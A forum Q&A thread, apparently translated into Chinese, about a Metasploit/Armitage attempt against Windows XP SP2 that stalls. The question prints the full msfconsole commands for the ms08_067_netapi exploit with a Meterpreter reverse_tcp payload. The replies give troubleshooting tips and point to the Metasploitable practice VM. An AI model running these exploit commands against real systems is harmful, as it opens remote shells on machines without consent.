Backtrack 5 Armitage MSF



我从Armitage开始学习Metasploit框架,以便对结构等有一个大致的了解。我试图破解一个旧的Windowx XP sp2,当我试图运行漏洞时,我得到了这个

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set LHOST 192.168.18.130
LHOST => 192.168.18.130
msf  exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf  exploit(ms08_067_netapi) > set LPORT 13592
LPORT => 13592
msf  exploit(ms08_067_netapi) > set RHOST 10.0.0.11
RHOST => 10.0.0.11
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > set SMBPIPE BROWSER
SMBPIPE => BROWSER
msf  exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf  exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.18.130:13592
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...

我没有得到任何错误,但它在那里停了下来,没有进行利用。

因此,该漏洞似乎不适用于现有版本的Windows。也许你可以尝试另一个,更简单的。这些漏洞是什么时候产生的?你绝对确定它们在你的Windows版本中没有修补吗?

如果你想从运行他人编写的漏洞利用脚本中学到什么,你必须开始调试并尝试了解脚本在做什么。找到脚本在说Attempting to trigger the vulnerability之后到底在做什么,并试图找出它可能不起作用的原因。这里有太多的可能性可以推测。

我写了Armitage。以下是需要记住的几件事:

  • ms08_067_netapi是针对未修补的Windows XP系统的可靠攻击。然而,远程攻击可能会出现许多问题。尝试重新启动目标系统,并确保基于主机的防火墙已关闭。如果它仍然不起作用,则可能您的XP系统已被修补耸耸肩

  • 我注意到这篇SO文章的标题提到了BackTrack Linux。BackTrack Linux不再支持Armitage。Metasploit框架在2013年4月经历了一次重大的依赖性转变,打破了BackTrack Linux环境。考虑迁移到Kali Linux。这是BackTrack Linux的继任者。

谷歌为卡利Linux〔我没有"声誉"点给你两个以上的链接〕

  • Armitage和Metasploit框架的最佳"第一个目标"是Metasploitable。这是一个免费的Linux虚拟机,由Metasploit团队提供。它内置了几个漏洞和错误配置。可在此处下载:

http://sourceforge.net/projects/metasploitable/files/Metasploitable2/

  • 我写了一个Armitage入门教程。本教程将带您了解针对Metasploitable虚拟机的一些攻击:

http://blog.strategiccyber.com/2013/02/06/getting-started-with-armitage-and-the-metasploit-framework-2013/

最新更新